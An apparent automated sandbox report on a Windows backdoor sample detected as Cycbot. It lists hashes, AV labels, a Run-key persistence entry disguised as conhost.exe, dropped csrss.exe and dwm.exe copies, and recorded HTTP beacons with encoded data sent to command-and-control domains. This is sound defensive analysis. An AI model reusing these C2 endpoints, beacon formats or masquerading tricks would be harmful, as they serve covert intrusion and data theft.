Analysis Date: 2014-08-17 11:29:04
MD5: a4eedc21f929ec2240d737184e6298e6
SHA1: 4385677d8ca561128f6564531742ddc2d188303e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 66c6f59007e8b567a3815021f17ea952 sha1: bfc5670ad59bebb44d30ff3bc88b9d5ca2abdc49 size: 94720
Section: .rdata md5: f9dc290e3f94a9d46421ea4682f69e90 sha1: c3e7d7d590c6ca6618af61cff40a62409520ec73 size: 1536
Section: .data md5: 0749533ef65a785cd5eea6a888cb37e3 sha1: 79d0527b4699fd936333b688cd08e8e019970fb9 size: 80384
Section: .reloc md5: 1ee72c8fd01847e3ba0c1e0793691be1 sha1: e88a882a5f51e20ea2b3856b6df71a80092b61c7 size: 1024
Timestamp: 2005-11-21 11:15:38
PEhash: f296a9095369ccf1d7761de3db87eb9b243bf51e
IMPhash: e048dc8f78dab5a5fbb34e4b57d5f053
AV: 360 Safe: Trojan.Generic.KD.367550
AV: Ad-Aware: Trojan.Generic.KD.367550
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): no_virus
AV: Authentium: W32/Goolbot.K.gen!Eldorado
AV: Avira (antivir): TR/Crypt.ZPACK.Gen
AV: CA (E-Trust Ino): Win32/FraudSecurity.B!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Trojan.Gbot-1130
AV: Dr. Web: BackDoor.Gbot.73
AV: Emsisoft: Trojan.Generic.KD.367550
AV: Eset (nod32): Win32/Kryptik.THG
AV: Fortinet: W32/FakeAV.ISS!tr
AV: Frisk (f-prot): W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AV: F-Secure: Rogue:W32/OpenCloud.A
AV: Grisoft (avg): Win32/Cryptor
AV: Ikarus: Backdoor.Win32.Cycbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Trojan.Win32.Generic
AV: MalwareBytes: Backdoor.Bot
AV: Mcafee: BackDoor-EXI.gen.s
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Trojan.Generic.KD.367550
AV: Norman: win32/Cycbot.EI
AV: Rising: Backdoor.Win32.Cycbot.a
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Trojan.Gen
AV: Trend Micro: BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32): BScope.Backdoor.Cycbot.2921
AV: Yara APT: no_virus
AV: Zillya!: Trojan.Menti.Win32.10748

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: freshmediaportal.com
Winsock DNS: resetmymemory.com
Winsock DNS: 127.0.0.1
Winsock DNS: realsoftwaredevelopment.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: realsoftwaredevelopment.com
Type: A
104.28.9.83
DNS: realsoftwaredevelopment.com
Type: A
104.28.8.83
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: resetmymemory.com
Type: A
192.155.89.148
DNS: worldmotoblo.com
Type: A
DNS: freshmediaportal.com
Type: A
HTTP GET: http://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v65=75&tq=gKZEtzy7A%2FM6iE8u5fLgBs1vuhnlsEhNrbfJbk4f0HGU6JH8%2FCDQpRwB1OSM8AmP2RBb8%2B1KST0TkX4bQEhOl6gvqzVsj602PYtP1PMlhLeepWV00LtD9NQgV53tnYTqAarOPAGXpYLePunu0BvW60H99GC2SEKUR9DAQ3rIygF6hH2yXMvwjWMuqD8wsljcIr8MCdDiFNSbkKKnlW04AaoakZuC7jkpvLfbtaVKpF7pidq2nGHXaqjp0ugVJmWkNE0UYXrrmyHLipfHkEw14tFEhsaQdVA0rADgL6LrF6AqsXyBk435iLWTz6jcAasCQmUmOt%2ByNHstJNoNvKkMgsd9y
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GET: http://resetmymemory.com/blog/images/3521.jpg?v78=22&tq=gKZEtzyMv5rJqxG1J42pzMffBfUq1ujbwvgS917W65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 104.28.9.83:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 192.155.89.148:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap

Strings